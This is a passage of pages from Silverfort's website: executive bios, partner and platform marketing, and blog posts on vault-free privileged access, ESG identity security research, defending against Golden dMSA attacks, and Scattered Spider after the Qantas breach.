a M. A. degree in Economics and Finance from Hebrew University, Jerusalem. Ron Rasin CSO As Chief Strategy Officer, Ron leads Silverfort’s strategic alliances with technology partners, as well as our growth operations and business strategy. He brings over a decade of hands-on product management experience and cyber security expertise. Prior to joining Silverfort, Ron was the Director of Product Management at Claroty, and held product management roles at Wix and NCR. Before that Ron served as a Team Leader at the 8200 elite cyber unit of the Israel Defense Forces. Ron holds a B. A in Economics from Tel Aviv University. Michelle Wideman CCO Michelle oversees Silverfort’s Customer Success and Support teams and is responsible for the customer experience, driving customer growth and retention. In this role, she works with the cross-functional teams to optimize the customer journey, ensuring customers realize the full value of the Silverfort solution. A people-first leader, she brings over twenty years of experience in Partnerships, Professional Services, Sales, Success, and Support. Prior to joining Silverfort in February 2023, she held executive leadership positions at Onna and Dell Boomi. Michelle has a Bachelor’s in Broadcast Communications & Journalism from Elon University. Our investors Silverfort has raised a total of $222m Read about our Series D “Silverfort is one of the rare companies that has successfully envisioned how a large market will need to transform to solve a tough problem – in this case, identity security. ” Mike Gregoire Founding Partner, Brighton Park Capital, Former CEO of CA Technologies & Taleo --- - Published: 2022-03-15 - Modified: 2025-07-30 - URL: https://www.silverfort.com/partners/ Partner with Silverfort Partnerships are key to our continued success and growth. Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, technology partners and more. Partner Portal or Become a partner Discover our full partner ecosystem. Identity Security Alliance We’re bringing security and identity leaders together to help businesses take their identity security where it has never gone before. Read more Channel partners By partnering with Silverfort, you can offer your customers every aspect of identity security, from universal MFA to lateral movement protection and rapid cyber insurance compliance. Read more Cyber insurance partners Help your insureds check off all MFA requirements, detect and protect their service accounts, and stop identity threats. Read more Technology partners Identity Security Alliance Our Identity Security Alliance brings together next-gen technology partners to develop and deliver comprehensive, end-to-end security integrations with Silverfort that can dynamically adapt to evolving identity infrastructures. Learn more Channel partners Partner with Silverfort By partnering with Silverfort, you can offer your customers every aspect of identity security: Complement your existing IAM and MFA offerings with extended MFA coverage for all resources, including those that couldn’t be protected before. Enhance your XDR offering with proactive protection against lateral movement and ransomware propagation attacks. Enable compliance with Cyber Insurance MFA requirements and other regulatory frameworks. Partner portal Become a partner Cyber Insurance Cyber Insurance Partner Ecosystem As a cyber insurance partner your insureds will have access to our special cyber insurance bundle and discounted pricing. Help insureds check off all their MFA requirements: email, remote network, and internal and external admin access. Giving your insureds the ability to detect and protect service accounts. Stop identity threats such as account takeover, lateral movement and the spread of ransomware. Learn more Already a Silverfort partner? Log in to partner portal --- - Published: 2022-03-14 - Modified: 2025-08-21 - URL: https://www.silverfort.com/platform/ The Silverfort Identity Security Platform Secure every dimension of identity. Leave no one behind. Protect workforce users, privileged users, third parties, AI Agents and non-human identities (NHIs). Get a demo or Take a tour Silverfort connects to your entire IAM infrastructure and secures it from within. Our platform uses Runtime Access Protection (RAP) technology to seamlessly integrate with your entire IAM infrastructure, delivering end-to-end visibility and inline protection to every identity, everywhere. No more user disruptions. No more system modifications. All identities Leave no one behind. Protect workforce users, privileged users, third parties and non-human identities (NHIs). All environments Apply security controls to every corner of your infrastructure: on-prem, OT, hybrid, cloud and multi-cloud. All resources Extend protection to every resource, from legacy systems and command-line tools to modern cloud workloads and SaaS apps. Get a demo The Silverfort difference Runtime Access Protection (RAP) 1 User requests access from IAM infrastructure 2 IAM infrastructure forwards request to Silverfort using RAP technology 3 Silverfort analyzes risk & triggers inline security controls if needed 4 Silverfort returns security verdict to IAM infrastructure 5 IAM infrastructure grants or denies access 1 User requests access from IAM infrastructure 2 IAM infrastructure forwards request to Silverfort using RAP technology 3 Silverfort analyzes risk & triggers inline security controls if needed 4 Silverfort returns security verdict to IAM infrastructure 5 IAM infrastructure grants or denies access https://www. silverfort. com/wp-content/uploads/2025/02/Marketecture-Graphics-for-Motion-1. mp4 Explore the Silverfort Identity Security Platform Finally, the identity security platform you deserve. End-to-end visibility and protection when it matters most. https://www. silverfort. com/wp-content/uploads/2025/02/SF-dashboard-anima2-1. mov Discover Discover every identity across every environment and monitor all access activity in one place for intelligent decision making. Analyze Analyze all identities and access attempts continuously to uncover security exposures and detect threats in real time. Enforce Enforce security controls to stop lateral movement, ransomware propagation and other identity threats in real time. Get a demo "It’s amazing how simple it was to deploy Silverfort—it only took a few hours to get up and running. As a result of Silverfort, our admin users are protected with strong MFA controls, and we closely monitor any malicious use of authentication protocols. " Lee HumphreysInfrastructure Security Architect | London Borough of Waltham Forest “We highly recommend Silverfort, as the identity insights you get, the flexibility for policy enforcement, and the granularity have been critical for our success in protecting our environments. ” Janusz Wreba-Jaworski Cyber Security Manager | Womble Bond Dickinson “Since deploying Silverfort, we have applied security controls and MFA protection to legacy applications, a vital step in improving our environments against ransomware threats. " Kurt GielenIT Manager | ZOL “Silverfort’s authentication firewall has significantly strengthened our security posture. We’ve been able to effectively mitigate identity threats by ensuring only authenticated users have access to our resources. ” Head of IAMLeading Retail Organization Identity security that works for you. Go beyond the limits of traditional identity security. Set up a demo to experience unified protection that stops identity-based attacks. Get a demo What’s new? View more --- --- ## Posts - Published: 2025-08-25 - Modified: 2025-08-21 - URL: https://www.silverfort.com/blog/the-future-of-privileged-access-is-vault-free/ The cybersecurity world was jolted by the recent announcement that Palo Alto Networks will acquire CyberArk in a landmark deal valued at approximately $25 billion. Beyond the financial scale of the transaction, this acquisition marks a shift in how the industry views identity security. The recent acquisition validates what we’ve been emphasizing already: identity is both the first and last line of defense, and it demands its own dedicated security layer. Just as we've seen in other domains like endpoint and cloud security, protecting identities requires an end-to-end platform—one that offers unified visibility, intelligent insights, and inline protection. CyberArk, rooted in Privileged Access Management (PAM), has expanded its identity capabilities in response to market needs. But this acquisition surfaces a more critical and timely question: What is the future of PAM?   We believe we’re witnessing the beginning of a transformation. A future where securing privileged access will no longer revolve around a vault. In fact, vault-based approaches will no longer be the primary method of enforcing privileged access security.   This shift parallels transformations we’ve already seen in other areas of cybersecurity:  Cloud security has gone agentless, replacing intrusive deployments with lightweight, API-based visibility.   Multi-Factor Authentication (MFA) does not require code changes or proxies as in the past. Today it is enforced by the identity provider or an extension to the identity provider. Identity protection platforms now enforce policies in real time without injecting keys or passwords, reducing the attack surface.   Network security moved away from physical firewalls and VPNs to Zero Trust Network Access (ZTNA), which grants access dynamically based on identity, context, and posture.   In each of these cases, the core idea was the same: move away from securing secrets or infrastructure, and instead focus on securing the access itself. PAM is now undergoing a similar evolution. The problem with vault-based PAM Vaults were introduced as a way to protect the credentials used by privileged accounts—admin usernames and passwords for servers, databases, switches, and more. The premise was sound: don’t let users know or reuse powerful passwords. Instead, let them retrieve credentials from a secure vault when needed, and rotate those passwords after use.   But in practice, vault-based PAM creates several problems:  It secures the credential, not the access. Once a user retrieves the credential, the vault’s protections end. That password can be stolen from memory, logged by malware, misused by insiders, or intercepted in a man-in-the-middle attack. The access itself isn’t protected—just the storage of the password.   It’s operationally complex. Vault-based PAM introduces major friction into workflows. Changing how users log into systems—redirecting them through a proxy, forcing them to check out passwords, re-authenticate constantly—often requires training, workarounds, or exceptions. On the NHI front, to rotate service account credentials multiple approvals are typically required and careful work to avoid breaking changes. This change in behavior complicates adoption and makes PAM deployments time-consuming and expensive. Many organizations take years to roll out PAM at scale, especially in hybrid environments where legacy systems, service accounts, and third-party access all require separate configurations. It’s not breach-proof. Vaults themselves are high-value targets. Attackers know that compromising a vault can yield credentials for the most sensitive systems in the organization. We’ve seen real-world breaches that prove this. In a high profile 2022 breach, the attacker reportedly gained access to the company’s privileged access vault by harvesting credentials and tricking an employee into approving MFA requests. Once inside, the attacker had access to admin tools, infrastructure, and sensitive data. In other incidents, attackers have exploited vault misconfigurations, API tokens, or integration weaknesses to escalate their access. The idea that vaults are unbreachable is no longer tenable.   It creates a false sense of security. Security teams often assume that rotating credentials and limiting access to the vault is enough. But if the password is still being handed to the user—even for a short time—it can still be exfiltrated or abused. The security controls (like MFA, session recording, or approval workflows) are tied to the vault, not to the privileged access itself. Once the login is done, there is no additional enforcement point to apply security controls.   Vault-centric PAM worked well in the era of static infrastructure and long-lived accounts. But today’s IT environments are dynamic, distributed, and identity-driven. Simply protecting credentials in a vault is no longer enough. From privileged account management to privileged access security The real opportunity—and what defines the vault-free future—is to shift from managing privileged accounts to securing privileged access.   In this model, organizations no longer rely on permanent accounts with vaulted passwords. Instead, privileges are granted dynamically, just-in-time, and removed as soon as they’re no longer needed. Access is brokered and monitored in real time based on user identity, context (device, location, time), and policy. This eliminates many of the risks associated with vault-based PAM:  There is no standing credential to steal or reuse.   The change to user behavior is minimal; no login disruption, and no password checkout process. All access is tightly monitored and tied to a verified identity.   Even if the attacker gains hold of the password, the access is still secured and the attack can be stopped there.   This model also extends seamlessly to non-human identities (NHIs)—like service accounts, scripts, AI agents, and automation tools—which now make up the majority of privileged access in most organizations. Rather than managing thousands of long-lived credentials for these entities, organizations can enforce policies that allow specific systems to initiate privileged access under strict controls, without static secrets. As NHIs become more manageable through identity providers, cloud-native tools, and runtime enforcement, the vault-free approach becomes both more feasible and more secure. Identity-centric access: A more secure approach This shift toward privileged access security is made possible by technological advances in identity security. Organizations can now apply strong security controls at the identity layer—enforcing MFA, risk-based policies, session monitoring, and just-in-time elevation—without injecting credentials or modifying infrastructure. In fact, modern platforms can secure privileged access in a way that’s:  Proxyless – doesn’t require routing all of the network traffic through a gateway or rewriting apps. Credential-free – avoids injecting or exposing privileged credentials.   Inline & real-time – dynamically responds to access attempts with adaptive policy decisions.   This architectural shift allows organizations to apply Zero Trust principles to privileged access—validating every request continuously, applying least privilege policies, and responding to anomalies instantly.   And it aligns with how security teams want to work: reducing the attack surface, minimizing user disruption, and simplifying operations. Will vaults disappear? Vaults will remain part of the privileged access landscape for the foreseeable future. Some systems will continue to require passwords. Some compliance requirements will mandate secure storage of credentials. And in certain break-glass or legacy scenarios, having a vault as a fallback mechanism still makes sense.   But vaults will no longer be the primary way organizations secure privileged access. Instead, the center of gravity will shift to real-time, identity-aware controls—a model that doesn’t rely on handing users credentials, and doesn’t require those credentials to exist in the first place.   We’re already seeing this transition unfold. Modern identity security platforms are being used to enforce granular access controls for privileged sessions across cloud and on-prem environments. These controls—based on who the user is, what resource they’re accessing, and under what context—are more precise, more scalable, and more secure than vault-based approaches.   And importantly, they’re faster to deploy and easier to manage, because they don’t require users to change how they log in or IT teams to redesign their environments. Looking ahead The future of privileged access is vault-free. Vaults served a critical function in an earlier era. But as identity becomes the new perimeter, and access becomes the control point, it’s time to move on.   Security leaders who want to reduce risk, accelerate zero trust adoption, and simplify their operational burden should begin by asking: Do I need to protect this password, or can I eliminate it altogether?   By shifting the focus from accounts to access, we can finally secure identities in a way that’s invisible to users, resistant to breaches, and built for the dynamic environments of today—and tomorrow.   Learn more about Privileged Access Security and how it benefits identity and security teams. --- - Published: 2025-08-13 - Modified: 2025-08-18 - URL: https://www.silverfort.com/blog/esg-research-reveals-importance-of-identity-security-consolidation/ Read the latest identity security research from Enterprise Strategy Group (ESG), unveiling key trends and investment plans. Enterprise Strategy Group (ESG) Principal Analyst Todd Thiemann released his latest research on identity security, titled “Identity Security at a Crossroads: Balancing Stability, Agility, and Security. ” The findings make one conclusion clear: with identity security growing more complex, teams believe consolidating capabilities into a single platform is a must to ensure visibility into what employees and non-human identities are accessing, acting on, and connecting to within their environments. Todd opens the report with the following note to readers: “Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and sprawling cloud deployments that are exposing unsolved problems, inefficient processes, and fragmented solutions. ”  Through the study, ESG surveyed 370 IT and cybersecurity decision-makers across multiple industries, mostly comprising organizations with at least 1,000 or more employees. The goal of this research is to identify and quantify major pain points for leaders managing identity security in their organizations and uncover trends that show how they plan to tackle those concerns. In this blog, we’ll unpack key findings from the research and explain what it means for organizations’ shifting priorities.   Ready to skip straight to the research? Download the Report here. 70% of teams plan to expand usage of an existing tool to cover a new use case in the next 12-18 months In addition to organizations expanding usage of existing tools, 62% of organizations plan to implement a net new tool to satisfy a use case, hinting that current solutions may be inadequate to satisfy evolving priorities. We’ll get into what those “evolving priorities” are later, but in the meantime it’s important to unpack the desire to consolidate or adopt new tools. Identity security teams need to evolve their existing tool stack to meet changing cybersecurity needs In the study, participants were asked “What identity solutions are currently in use or expected to be in the next 12-24 months? ” Across 18 functional areas including MFA, NHI security, ITDR, and more, nearly half of organizations reported that they use multiple solutions for each. In fact, identity teams “use an average of 11 tools, and the proliferation of tools leads to operational complexity, poor visibility, and identity silos. ” If you’re an identity security practitioner looking for an MFA solution (as an example), ESG research shows that 46% of teams aren’t just using one tool for MFA, they’re using multiple. Add in the complexity of 18 functional areas to satisfy? The idea of “tool sprawl” doesn’t even begin to cover what teams have been working with.   What factors drive the tool sprawl?   52% report that cloud adoption plays a factor 51% cite cyber insurance requirements 48% note that they need separate tools for separate environments (like on-prem versus cloud) The list continues on page eight of the report With 46% of organizations managing anywhere from 500-2,499 business applications, consolidation is now a necessity. With a unified identity security platform, teams can gain the comprehensive visibility they need, uncover powerful context across the organization, and make insights-based decisions made possible by having the full picture. 67% of teams are concerned about NHI Security, while 52% believe AI agent adoption raises data privacy issues Non-human identities include identities like service accounts and API keys. While teams are concerned about securing NHIs, very few have deployed an NHI-specific security tool. Instead, 77% of them are choosing identity security or IAM platforms to tackle NHI security. Again, enterprise identity security teams demonstrate that folding in NHIs into their entire identity security strategy rather than selecting a point solution leads to stronger security outcomes. The growth of agentic AI raises cybersecurity concerns, such as data privacy Teams report that securing AI agents is now on their radar, too. Data privacy is the top concern, but other sources of uneasiness around AI agents include “Failure of human oversight” and “Control of AI agents falling into adversary hands. ” The truth is, AI agents are not machines, nor are they human. They lie somewhere in between and therefore need to be treated as their own category of identity. An AI Agent security solution needs to address these concerns, so every AI agent is tied to a human and has the proper policies in place to prevent (and detect) improper activity. Identity Security investment will keep growing—get the research to learn more 91% of organizations surveyed consider identity security one of their top five priorities in the next 12-24 months, with 42% expressing it is the number one priority. As areas like AI agent security, ITDR, and ISPM become critical to an organization’s overall identity security strategy, teams need to consider how to balance a growing number of focus areas alongside having the right tools to provide the full context needed to make informed decisions for the business. As ESG's research uncovers, tool consolidation offers a path to accomplish those goals, with identity security platforms offering the highest chance of meeting the desired outcomes. In fact, a top motivator for many participants (24%) to evolve their existing identity security portfolios was “cost savings because of vendor consolidation,” validating that this approach saves money while optimizing resource utilization. Download the complete research today to see how your identity security peers are tackling top concerns and where they plan to invest to achieve their goals in 2025 and beyond. --- - Published: 2025-08-07 - Modified: 2025-08-07 - URL: https://www.silverfort.com/blog/stopping-golden-dmsa-attacks-before-they-start/ Microsoft’s recent research spotlights a dangerous post-exploitation technique called Golden dMSA. This new attack method abuses SYSTEM-level access on domain controllers to execute persistent payloads, including ransomware that targets the core of Active Directory. By hijacking delegated Managed Service Accounts (dMSAs), attackers can gain access without needing to compromise traditional credentials.   Originally introduced in Windows Server 2025, delegated Managed Service Accounts (dMSAs) are a major advancement in service account security. While static password-based accounts remain susceptible to Kerberoasting attacks, dMSAs shift the authentication model by binding access directly to verified machines in Active Directory (AD).   This machine-centric approach eliminates credential theft by tying access to device identity rather than user-managed passwords, ensuring that only explicitly authorized machines can leverage the account. However, when abused in post-exploitation scenarios, dMSAs can be used by attackers to execute malicious code from within trusted high-privilege infrastructures.   In this blog, we will break down how the Golden dMSA attack flow works, why it poses multiple risks, and how organizations can secure machine identities before attackers do. What is Golden dMSA? Golden dMSA is a post-exploitation technique that allows attackers to gain long-term access in Active Directory (AD) environments by generating valid passwords for delegated Managed Service Accounts (dMSAs) and group Managed Service Accounts (gMSAs).   This method becomes viable after the attacker has already gained privileged access, such as Domain Admin or SYSTEM-level permissions on a domain controller. From there, they can take advantage of a flaw in the way these service account passwords are generated. The process includes predictable, time-based elements with limited variability, making it easy to reverse-engineer and reproduce the correct passwords.   Attackers can then generate credentials offline and impersonate critical service accounts across the domain, bypassing normal security controls and password rotation mechanisms.   How a Golden dMSA attack unfolds A Golden dMSA attack typically begins after an attacker gains a foothold in the environment and escalates privileges. From there, the method enables covert persistence and extensive lateral movement across Active Directory. This is how the typical golden dMSA attack occurs: 1. Initial access and privilege escalation The attacker compromises a system within the domain and escalates to Domain Admin or SYSTEM-level access on a domain controller, often through phishing, credential theft, or exploiting misconfigurations. 2. Extraction of the KDS root key With privileged access, the attacker extracts the Key Distribution Services (KDS) root key, a critical cryptographic secret used by Active Directory to generate passwords for managed service accounts. 3. Service account enumeration The attacker identifies delegated Managed Service Accounts (dMSAs), and group Managed Service Accounts (gMSAs) across the forest. This typically involves querying for account names and associated identifiers using LDAP or other directory tools. 4. Offline password generation Due to a weakness in the password generation algorithm, the attacker can brute-force the values and generate valid passwords using tools like Golden dMSA, without triggering alerts.   5. Post-exploit impact: SYSTEM-level ransomware deployment  With credentials for service accounts in hand, the attacker can reenter the domain controller and operate with SYSTEM-level privileges. From here, they can:  Tamper with core processes like LSASS (e. g. , for further credential dumping or injection). Deploy ransomware from a central, high-trust machine with domain-wide access. Move laterally to other systems and infrastructure. This stage of the attack is crucial because ransomware executed from a domain controller typically includes broad domain trust and can spread rapidly. Most EDR solutions have limited visibility into SYSTEM-level operations, especially on domain controllers. To make matters worse, service account activity often goes undetected by standard security solutions. Source: Hacker News How Golden dMSA bypasses traditional security solutions Golden dMSA is particularly dangerous not because it breaks in, but because of what it can do after gaining access. Due to it being a post-exploitation technique, by the time it is exploited by the targeted domain controller, most security solutions are already out of scope.   Detection becomes especially difficult because attackers operate using legitimate credentials and elevated privileges. Once the attacker gains SYSTEM-level access, common security tools like EDR and antivirus struggle to provide visibility or enforce controls in those privileged contexts.   Lateral movement also comes into play as it blends in with normal admin activity, making it hard to differentiate malicious actions from routine domain operations. Since no malware or exploits are necessarily involved at this stage, signature-based or behavior-based detection systems may not trigger alerts at all.   In short, once attackers are inside the perimeter and leveraging Golden dMSA, the usual security layers offer little resistance, making early detection and privilege boundary hardening critical. Silverfort's Golden dMSA prevention approach Even in post-exploitation scenarios like Golden dMSA where traditional security tools often fall short, Silverfort protects direct and indirect access to domain controllers with MFA and strict real-time access policy enforcements that actively stop attackers from progressing inside the environment. Enforcing MFA for admin access to domain controllers Silverfort enables organizations to enforce MFA on any access attempt to domain controllers, including:  Remote Desktop Protocol (RDP) sessions PsExec executions SMB file share access By enforcing MFA at traditionally unprotected access points such as RDP and PsExec, Silverfort has the capability to require users to verify their identity with MFA, which can help prevent an attacker from moving laterally across an environment. This disrupts the attacker’s ability to leverage Golden dMSA-generated credentials for privileged access, effectively halting progression even after initial compromise. Policy enforcing MFA on DC access via RDP or PsExec MFA protection on direct Windows logins to domain controllers Silverfort provides the ability to enforce MFA on all interactive logins to domain controllers, including:  Local console logins Remote Desktop Protocol (RDP) sessions Any direct login using valid domain credentials By enforcing MFA at these critical access points, Silverfort prevents unauthorized access to domain controllers even if attackers possess valid credentials. This capability is especially important in scenarios involving credential-based attacks like Golden Ticket, Pass-the-Hash, or lateral movement. Requiring MFA at the moment of login disrupts the attack chain early, turning domain controllers from high-risk targets into secure endpoints.   Silverfort policy enforcing MFA on interactive DC logins Real-time access enforcement Silverfort performs real-time analysis of authentication traffic across the environment, correlating signals from user identity, device posture, access protocol, and behavioral patterns. This enables precise enforcement decisions at the identity layer, allowing you to:  Block unauthorized or misused access paths to critical systems like domain controllers, even if valid credentials are used. Detects tool-based anomalies such as unexpected use of PsExec, PowerShell, or other lateral movement utilities by analyzing deviations from known admin behavior baselines. Disrupt lateral movement early by enforcing access policies that adapt to risk context, preventing escalation before attackers reach sensitive targets. Access block triggered by suspicious authentication Virtual fencing to stop lateral movement Silverfort can apply virtual fencing capabilities not just for users, but also for non-human identities. These policies establish explicit access boundaries, restricting movement based on the identity type (user or service account), its role, and contextual factors such as source system, access method, and protocol.   Unlike traditional network segmentation, which lacks visibility into identity context, Silverfort enforces policy at the authentication layer. This enables real-time enforcement that blocks credential-based movement, even when attackers are using legitimate credentials or SYSTEM-level privileges.   Silverfort’s approach ensures:  Human users are only able to access the systems and workloads explicitly assigned to them, eliminating blanket access between domain-joined machines. Service accounts including dMSAs, gMSAs, and other non-human identities, are governed by virtual fencing protection policies that define which machines, services, or apps they are allowed to interact with. Any unauthorized service-to-service access attempts are denied outright. Lateral movement, whether through interactive tools (RDP, PsExec) or automated processes (scheduled tasks, service start-ups), is evaluated in real time and blocked unless it aligns with predefined policy. Service account policy By enforcing these controls in identity and authentication flows, Silverfort eliminates blind spots where service accounts and privileged users traditionally move unchecked, reducing lateral movement risk even in fully-compromised privileged environments. Stopping lateral movement starts at the authentication layer Golden dMSA is a reminder that no perimeter is inherently secure and that attackers will compromise when provided with the opportunity. The real challenge is what happens next, especially when they reach domain controllers with SYSTEM-level access.   That is why real-time identity enforcement needs to be at the forefront to ensure protection. To defend against post-exploit techniques, organizations need to apply security controls at the authentication layer, not just the endpoint or network.   Silverfort makes this possible. By enforcing least privilege, monitoring authentication in real time, and controlling both user and service account access, Silverfort prevents lateral movement and service abuse—even when credentials are legitimate.   Learn how to defend against Golden dMSA and other identity-based attacks by scheduling a call with one of our identity security experts.   --- - Published: 2025-08-06 - Modified: 2025-08-08 - URL: https://www.silverfort.com/blog/into-the-spider-verse-qantas-scattered-spider-and-what-australian-teams-should-learn/ As both a Qantas Frequent Flyer and a cybersecurity professional based in Sydney, I felt the impact of the airline’s June 2025 breach personally. The breach was a result of attackers accessing a third-party customer service platform operated by an overseas call centre and exposed personal data of approximately 5. 7 million customers, myself included. While the breach did not directly threaten imminent financial loss, it does significantly increase the risk of secondary attacks using the leaked personal data. The breach showed no signs of ransomware or sophisticated payloads. Instead, it bore the hallmarks of Scattered Spider, a threat group that relies on social engineering, abuse of legitimate credentials, and lateral movement through protocols that evade traditional security controls. This incident is yet another proof point that identity has become one of the top attack vectors, especially across the hybrid IT environments that dominate Australian enterprises and their supply chain. These environments blend cloud, on-prem, and vendor-operated systems, but lack unified identity control, making detection and response much harder. In this blog, we’ll explain who Scattered Spider is and why Australia is a growing target, the methods they use and why they are so effective, and the tactical steps Australian security teams can take to prevent and respond to identity-based attacks. Who is Scattered Spider, and why are they targeting Australia? Scattered Spider (aka UNC3944, Scatter Swine, Octo Tempest, Starfraud, Muddled Libra) is a financially motivated cybercriminal group focused on identity as the main attack vector. Active since at least 2022, reportedly composed primarily of young, native English-speakers from the US and the UK, the Scattered Spider group rarely uses malware or ransomware, and targets some of the most defended sectors, such as financial services and gaming. Their toolkit often doesn't rely on code, rather it relies on confidence tricks, protocol gaps, and our basic assumptions about trust. Common techniques include:- Phishing, Smishing & Vishing: Camouflaged emails/SMS or phone calls impersonating IT or help desk staff to trick staff into providing PII, credentials or performing MFA resets. - Help Desk impersonation: Often posing as internal IT or helpdesk staff to direct employees to perform unsafe activities, such as running remote access tools or share MFA codes. - MFA fatigue: Spamming users with push notifications until they click "approve. - SIM swapping: Hijacking phone numbers to receive MFA codes. - Living off the land: Using PowerShell, PsExec, and RDP or commercial remote-access utilities (such as TeamViewer, Ngrok, ScreenConnect, Fleetdeck, etc. ), tools already available inside every enterprise to move laterally and evade detection. - Compromising hypervisors: More recently, attacks have escalated beyond Active Directory compromise to directly targeting and manipulating VMware ESXi infrastructure, enabling attackers to bypass certain controls, such as endpoint protection, entirely. While their initial focus was on US-based casinos, insurers, and retailers, 2024-2025 has seen them pivot sharply toward aviation, logistics, and infrastructure in Australia. Why Australia? 1. Widespread hybrid and fragmented identity infrastructure Australian enterprises commonly rely on a mix of on-prem Active Directory, cloud identity providers (e. g. , Entra ID, Okta), SSO platforms, and PAM tools. While each secures a slice of the environment, they often operate in silos, leading to visibility gaps and incomplete control enforcement. This creates ideal conditions for identity-based attackers to slip through the cracks. 2. Complex and diverse identity and IT ecosystems Australian enterprises are typically early adopters of technology and have gone through multiple waves of digital transformation and productivity-enhancing outsourcing. Over time, this has led to a highly interconnected ecosystem of third-party vendors, partners, and contractors, each requiring access to different parts of the enterprise. The result is a sprawling identity landscape with countless potential entry points to secure. 3. High-value customer data in a regulatory and reputational powder keg Australian enterprises operate under increasingly demanding privacy and cybersecurity regulations, including the Notifiable Data Breaches scheme and evolving critical infrastructure mandates. At the same time, they store vast volumes of high-value personal data, such as financial, health, and identity records, which are lucrative targets for extortion, resale, or impersonation. These dual pressures make breaches more damaging and responses more urgent, amplifying the impact of identity-based attacks. How to prevent identity threats before they start 1. Harden the help desk, but don’t over-rely on it Problem: Scattered Spider often gains initial access through social engineering, targeting real human beings. This is especially effective in help desk environments, where staff are under pressure to resolve issues quickly and maintain high customer satisfaction. These attacks exploit human trust and judgment, making them difficult to consistently prevent. Solution: Help desk procedures should be strengthened and reviewed regularly, but controls must extend beyond initial access. Attackers like Scattered Spider exploit legacy trust models that assume anything inside the perimeter is legitimate. Identity-layer segmentation, especially in Active Directory, is critical to slowing attackers and limiting the blast radius. Privileged identities should be blocked from accessing non-privileged environments (and vice versa), and third-party suppliers should only access what they need. A tiering model can further separate identities and systems by business criticality and risk. 2. Close MFA Gaps in legacy protocols Problem: Protocols like NTLM, LDAP, and SMB don’t natively support MFA, and attackers know it. These gaps are frequently exploited to bypass modern access controls. Solution: Extend MFA enforcement to cover all Active Directory protocols, including legacy ones, to ensure attackers can’t sidestep protections. While eliminating these vulnerable protocols entirely isn’t always feasible, restricting their use to only the systems that absolutely require them is both practical and impactful. 3. Implement phishing-resistant authentication methods (e. g. passkeys and FIDO2) Problem: SMS-based MFA and push fatigue are easily bypassed with social engineering or SIM-swapping. Solution: Adopt phishing-resistant methods like FIDO2 hardware keys or platform passkeys for privileged users and critical systems. These provide cryptographic proof of possession and can’t be phished or replayed. 4. Detect and block lateral movement in real time Problem: After initial access, attackers "live off the land" using RDP, PowerShell, and legitimate credentials which go undetected in most hybrid environments. Solution: Continuously monitor authentication flows across on-prem and cloud identity infrastructure to identify unusual movement patterns between systems and trigger inline MFA or deny access before the attacker escalates privileges. 5. Protect non-human identities Problem: These accounts are often numerous, highly privileged, invisible in day-to-day operations, and poorly secured, making them ideal attack vectors or targets for abuse. Solution: Begin by establishing a comprehensive inventory of non-human identities, including service accounts, automation credentials, and machine identities. Continuously monitor their behaviour for unusual access patterns, restrict their use to only what’s necessary, and apply least privilege permissions. This must be done in a way that is automated, scalable, and grounded in operational context. Spreadsheets, manual reviews, and reliance on tribal knowledge simply do not scale in modern enterprise environments. 6. Contain fast without stopping business - before you know what's compromised Problem: In identity attacks like Scattered Spider, response delays let the attacker move laterally, disable logging, or escalate privileges, all using valid credentials. Solution: Define and prepare containment policies in advance, so they can be activated instantly to block compromised accounts, trigger reauthentication, or isolate specific systems. These policies should be designed with resilience in mind, limiting attacker movement while minimising impact on business operations. Preparation also means productivity is not affected in case of a breach. Look at using phishing-resistant MFA as a mediator and improve cyber resilience so that legit authorised users can continue to be productive and deliver services, hampering attackers' ability to achieve their objectives. When the breach happens: Identity-first incident response Even with the best defences, compromise can still happen. What matters most is what you do in the initial hours. For example, requiring MFA for high-risk actions helps contain threats without disrupting core business operations. Here's a streamlined response framework built for identity-based breaches: Containment Enforce deny or MFA policies instantly on all users Identify compromised accounts based on MFA violations or unusual access Isolate machines where affected accounts logged in Recovery Gradually replace deny with MFA to restore access Reintroduce critical services in controlled phases Maintain elevated monitoring of previously-compromised accounts Remediation Trace how the attacker moved between systems using authentication logs, and identify the specific identity weaknesses (like misconfigurations or excessive privileges) that enabled that movement Use those insights to strengthen long-term identity security posture Final thoughts: Australia can lead in identity resilience The Qantas incident wasn't a one-off. It was a warning flare that identity-based attacks, like those used by Scattered Spider, are here, active, and evolving. As a local citizen caught in the blast radius, I believe we can meet this moment with urgency and confidence. Australia’s hybrid identity infrastructure and IT ecosystem are complex, but with the right plan, that complexity can be protected, monitored, and controlled. Phishing-resistant MFA and well-defined access policies across all access points including legacy protocols, limiting access based on least privilege and business criticality, and identity-first incident response can contain threats quickly while keeping business operations running. Australia doesn’t have to wait for another breach to act. We can lead. To learn more about how to build an incident response playbook against threat groups like Scattered Spider, I invite you to watch this webinar on-demand. --- - Published: 2025-08-06 - Modified: 2025-08-07 - URL: https://www.silverfort.com/blog/what-the-future-holds-for-identity-security-after-cyberarks-acquisition-by-palo-alto-networks/ Last week, Palo Alto Networks announced its intention to acquire CyberArk for $25B. This is Palo Alto Networks’ first move into the identity security market, and given the size of the reported transaction – it’s a bold and strategic one. Here at Silverfort, we’ve seen firsthand that identity has become the new perimeter, and the only remaining line of defense for enterprises, both on-prem and in the cloud. This becomes even more true in the AI era. As such, securing identities requires taking a similar approach to what we’ve seen in other areas of cybersecurity like endpoint security or cloud security. It requires a comprehensive platform that enables unified visibility, intelligence, and active protection capabilities. It’s time to move beyond point solutions like PAM, MFA, NHI, CIEM, ITDR or ISPM – and adopt a consolidated approach that solves this problem end to end.   Where does identity security go from here, now that one of the largest cybersecurity companies in the world is making it a priority? In this blog, I’ll share some of my thoughts about this pivotal moment and what the future holds for identity security. Why is Palo Alto Networks making such a strategic investment in Identity Security? In Palo Alto Networks’ press release, the company states that this acquisition means “establishing Identity Security as a new core platform”. In addition, CEO Nikesh Arora says: “Our market entry strategy has always been to enter categories at their inflection point, and we believe that moment for Identity Security is now... Today, the rise of AI and the explosion of machine identities have made it clear that the future of security must be built on the vision that every identity requires the right level of privilege controls, not the ‘IAM fallacy’. ”  Let’s go through each of these key points:  The moment for identity security is now: According to research from analyst Francis Odum, 93% of breaches are preventable through improved identity security controls. After years of investing heavily in areas like endpoint, network and cloud security, many organizations now realize that identity security was left behind, with legacy technologies and point solutions, and identity has become the weakest link. An example is the recent attacks on the UK retail sector which stemmed from a known ransomware group exploiting identities and then moving laterally within targeted environments. Identity creates a sprawling attack surface, but with modern technologies and a platform approach, comprehensive security is finally possible.   The rise of AI: IBM’s 2025 Cost of a Data Breach report states that 63% of organizations lack AI governance policies. Various teams 